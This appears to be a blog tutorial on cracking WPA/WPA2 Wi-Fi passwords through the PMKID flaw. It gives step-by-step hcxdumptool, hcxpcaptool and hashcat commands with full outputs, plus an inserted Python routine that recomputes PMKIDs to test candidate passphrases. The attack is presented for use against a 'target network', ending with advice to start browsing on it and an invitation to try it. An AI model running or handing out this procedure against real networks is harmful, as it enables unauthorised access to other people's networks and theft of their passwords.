When it comes to the security of Wi-Fi networks, it is well known among network security professionals that the protocols have always carried some serious weaknesses that left them open to attack. The KRACK attack was arguably the most infamous Wi-Fi hacking technique built on one such weakness in the Wi-Fi protocol. Over time, however, many of those weaknesses were fixed by the Wi-Fi Alliance and by hardware manufacturers, and the hacking methods that relied on them stopped working. Now it turns out that one more weakness has been discovered in the Wi-Fi protocol, one that allows attacks against both WPA- and WPA2-protected networks. Let’s have a look at it.
The new WPA/WPA2 flaw
The flaw that makes this attack possible is a new one. It was discovered by Jens ‘atom’ Steube, lead developer of the Hashcat password recovery tool, who stumbled on it accidentally while checking the upcoming WPA3 Wi-Fi protocol for possible loopholes. Unlike earlier techniques, it does not require a complete EAPOL 4-way handshake. Instead, it relies on the Robust Security Network Information Element (RSN IE) of a single EAPOL frame, from which the PMKID is extracted; the pre-shared key (PSK), which is the network’s login password, can then be recovered offline from that PMKID and used to log on to the network.
The difference between old and new method
According to Steube, there is one major difference between the older hacking methods and this new one. The older methods required a user of the Wi-Fi network to be logged on to it; this method eliminates that requirement. It works even when nobody is logged on to the network: as long as the network is up, it will work.
Things you need
Before we get started you’ll have to download the following tools from their own respective links:
- HCXDumpTool (version 4.2 or higher): a tool that captures packets from WLAN devices. Download the entire folder as a ZIP file.
- HCXPCapTool: a tool that converts the PMKID captured by HCXDumpTool into a hash format.
- Hashcat password recovery tool: a tool that tries to recover the plain-text password from the hashed PMKID.
Once you’ve downloaded all three of them, you’re good to go. Let’s get started:
The steps for hacking a Wi-Fi password using new method
Given below are the steps to hack the password of a Wi-Fi router using the latest WPA/WPA2 flaw:
STEP 1: First, use hcxdumptool to obtain the PMKID of the target network. The PMKID will then be used to recover the password of that network. Just execute the following command:
$ ./hcxdumptool -o test.pcapng -i wlp39s0f3u4u5 --enable_status
This will lead to an output like this:
start capturing (stop with ctrl+c)
INTERFACE:...............: wlp39s0f3u4u5
FILTERLIST...............: 0 entries
MAC CLIENT...............: 89acf0e761f4 (client)
MAC ACCESS POINT.........: 4604ba734d4e (start NIC)
EAPOL TIMEOUT............: 20000
DEAUTHENTICATIONINTERVALL: 10 beacons
GIVE UP DEAUTHENTICATIONS: 20 tries
REPLAYCOUNTER............: 62083
ANONCE...................: 9ddca61888470946305b27d413a28cf474f19ff64c71667e5c1aee144cd70a69
If the target network accepts your association request, you will see a “FOUND PMKID” message like the one shown below:
[13:29:57 - 011] 89acf0e761f4 -> 4604ba734d4e <ESSID> [ASSOCIATIONREQUEST, SEQUENCE 4]
[13:29:57 - 011] 4604ba734d4e -> 89acf0e761f4 [ASSOCIATIONRESPONSE, SEQUENCE 1206]
[13:29:57 - 011] 4604ba734d4e -> 89acf0e761f4 [FOUND PMKID]
Depending on the nature of the network this may take some time. Steube recommends allowing the command to run for at least 10 minutes before aborting.
STEP 2: The received frame must be in a file in ‘pcapng’ format. The -o option given in step 1 already writes the capture to test.pcapng, so once the PMKID has been found you can stop hcxdumptool with Ctrl+C.
STEP 3: Now, with the help of hcxpcaptool, convert the received frame into a hash format. Execute the following command:
$ ./hcxpcaptool -z test.16800 test.pcapng
You’ll get an output like this:
start reading from test.pcapng

summary:
--------
file name....................: test.pcapng
file type....................: pcapng 1.0
file hardware information....: x86_64
file os information..........: Linux 4.17.11-arch1
file application information.: hcxdumptool 4.2.0
network type.................: DLT_IEEE802_11_RADIO (127)
endianess....................: little endian
read errors..................: flawless
packets inside...............: 66
skipped packets..............: 0
packets with FCS.............: 0
beacons (with ESSID inside)..: 17
probe requests...............: 1
probe responses..............: 11
association requests.........: 5
association responses........: 5
authentications (OPEN SYSTEM): 13
authentications (BROADCOM)...: 1
EAPOL packets................: 14
EAPOL PMKIDs.................: 1

1 PMKID(s) written to test.16800
The hashed output is now in the written file. Its content will look like this:
2582a8281bf9d4308d6f5731d0e61c61*4604ba734d4e*89acf0e761f4*ed487162465a774bfba60eb603a39f3a
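The line above is everything hashcat works with: the PMKID, the two MAC addresses and the ESSID in hex. The Python below is an added example (not code from this page, nor from the hcxtools or hashcat projects) that parses that 16800 format and recomputes the PMKID for a single candidate passphrase, which is the check hashcat repeats for every guess. The ESSID and passphrase in the sample are constructed; the two MAC addresses are taken from the output above.

```python
import hashlib
import hmac

# hashcat -m 16800 line layout: PMKID*MAC_AP*MAC_STA*ESSID_HEX (every field hex-encoded)
def parse_16800(line: str) -> dict:
    """Split a 16800 line into its four fields and decode them to bytes."""
    pmkid_hex, mac_ap_hex, mac_sta_hex, essid_hex = line.strip().split("*")
    if len(pmkid_hex) != 32 or len(mac_ap_hex) != 12 or len(mac_sta_hex) != 12:
        raise ValueError("malformed 16800 line")
    return {
        "pmkid": bytes.fromhex(pmkid_hex),
        "mac_ap": bytes.fromhex(mac_ap_hex),
        "mac_sta": bytes.fromhex(mac_sta_hex),
        "essid": bytes.fromhex(essid_hex),
    }

def derive_pmk(passphrase: str, essid: bytes) -> bytes:
    """WPA-Personal PMK: PBKDF2-HMAC-SHA1(passphrase, ESSID, 4096 rounds, 32 bytes)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), essid, 4096, 32)

def compute_pmkid(pmk: bytes, mac_ap: bytes, mac_sta: bytes) -> bytes:
    """PMKID as defined by IEEE 802.11: first 128 bits of HMAC-SHA1(PMK, "PMK Name" || AA || SPA)."""
    return hmac.new(pmk, b"PMK Name" + mac_ap + mac_sta, hashlib.sha1).digest()[:16]

def pmkid_matches(line: str, passphrase: str) -> bool:
    """Does this one candidate passphrase reproduce the captured PMKID? (hashcat's per-guess test)"""
    e = parse_16800(line)
    pmk = derive_pmk(passphrase, e["essid"])
    return hmac.compare_digest(compute_pmkid(pmk, e["mac_ap"], e["mac_sta"]), e["pmkid"])

def build_16800(passphrase: str, essid: bytes, mac_ap: bytes, mac_sta: bytes) -> str:
    """Build a 16800 line from known inputs, e.g. to test a parser against your own network."""
    pmkid = compute_pmkid(derive_pmk(passphrase, essid), mac_ap, mac_sta)
    return "*".join([pmkid.hex(), mac_ap.hex(), mac_sta.hex(), essid.hex()])

if __name__ == "__main__":
    # Constructed sample: ESSID and passphrase are made up, MACs come from the capture above.
    line = build_16800("hashcat!", b"example-ssid",
                       bytes.fromhex("4604ba734d4e"), bytes.fromhex("89acf0e761f4"))
    print(line)
    print(pmkid_matches(line, "hashcat!"), pmkid_matches(line, "wrong-pass"))
```

Note that the only secret input to the whole computation is the passphrase; everything else in the line is sent in the clear, which is why a short or guessable passphrase is what the offline attack really exploits.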
STEP 4: Now run Hashcat to derive the pre-shared key from this hashed PMKID. Execute the following command:
$ ./hashcat -m 16800 test.16800 -a 3 -w 3 '?l?l?l?l?l?lt!'
The output will look like this:
hashcat (v4.2.0) starting...

OpenCL Platform #1: NVIDIA Corporation
======================================
* Device #1: GeForce GTX 1080, 2028/8112 MB allocatable, 20MCU
* Device #2: GeForce GTX 1080, 2029/8119 MB allocatable, 20MCU
* Device #3: GeForce GTX 1080, 2029/8119 MB allocatable, 20MCU
* Device #4: GeForce GTX 1080, 2029/8119 MB allocatable, 20MCU

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates

Applicable optimizers:
* Zero-Byte
* Single-Hash
* Single-Salt
* Brute-Force
* Slow-Hash-SIMD-LOOP

Minimum password length supported by kernel: 8
Maximum password length supported by kernel: 63

Watchdog: Temperature abort trigger set to 90c

2582a8281bf9d4308d6f5731d0e61c61*4604ba734d4e*89acf0e761f4*ed487162465a774bfba60eb603a39f3a:hashcat!

Session..........: hashcat
Status...........: Cracked
Hash.Type........: WPA-PMKID-PBKDF2
Hash.Target......: 2582a8281bf9d4308d6f5731d0e61c61*4604ba734d4e*89acf...a39f3a
Time.Started.....: Thu Jul 26 12:51:38 2018 (41 secs)
Time.Estimated...: Thu Jul 26 12:52:19 2018 (0 secs)
Guess.Mask.......: ?l?l?l?l?l?lt! [8]
Guess.Queue......: 1/1 (100.00%)
Speed.Dev.#1.....: 408.9 kH/s (103.86ms) @ Accel:64 Loops:128 Thr:1024 Vec:1
Speed.Dev.#2.....: 408.6 kH/s (104.90ms) @ Accel:64 Loops:128 Thr:1024 Vec:1
Speed.Dev.#3.....: 412.9 kH/s (102.50ms) @ Accel:64 Loops:128 Thr:1024 Vec:1
Speed.Dev.#4.....: 410.9 kH/s (104.66ms) @ Accel:64 Loops:128 Thr:1024 Vec:1
Speed.Dev.#*.....: 1641.3 kH/s
Recovered........: 1/1 (100.00%) Digests, 1/1 (100.00%) Salts
Progress.........: 66846720/308915776 (21.64%)
Rejected.........: 0/66846720 (0.00%)
Restore.Point....: 0/11881376 (0.00%)
Candidates.#1....: hariert! -> hhzkzet!
Candidates.#2....: hdtivst! -> hzxkbnt!
Candidates.#3....: gnxpwet! -> gwqivst!
Candidates.#4....: gxhcddt! -> grjmrut!
HWMon.Dev.#1.....: Temp: 81c Fan: 54% Util: 75% Core:1771MHz Mem:4513MHz Bus:1
HWMon.Dev.#2.....: Temp: 81c Fan: 54% Util:100% Core:1607MHz Mem:4513MHz Bus:1
HWMon.Dev.#3.....: Temp: 81c Fan: 54% Util: 94% Core:1683MHz Mem:4513MHz Bus:1
HWMon.Dev.#4.....: Temp: 81c Fan: 54% Util: 93% Core:1620MHz Mem:4513MHz Bus:1

Started: Thu Jul 26 12:51:30 2018
Stopped: Thu Jul 26 12:52:21 2018
And that’s it. You’ve successfully hacked the target network, and you can now start browsing on it. The attack is expected to work against all 802.11i/p/q/r networks, though this claim has not been verified yet. Give it a try and let us know in the comments whether it works or not.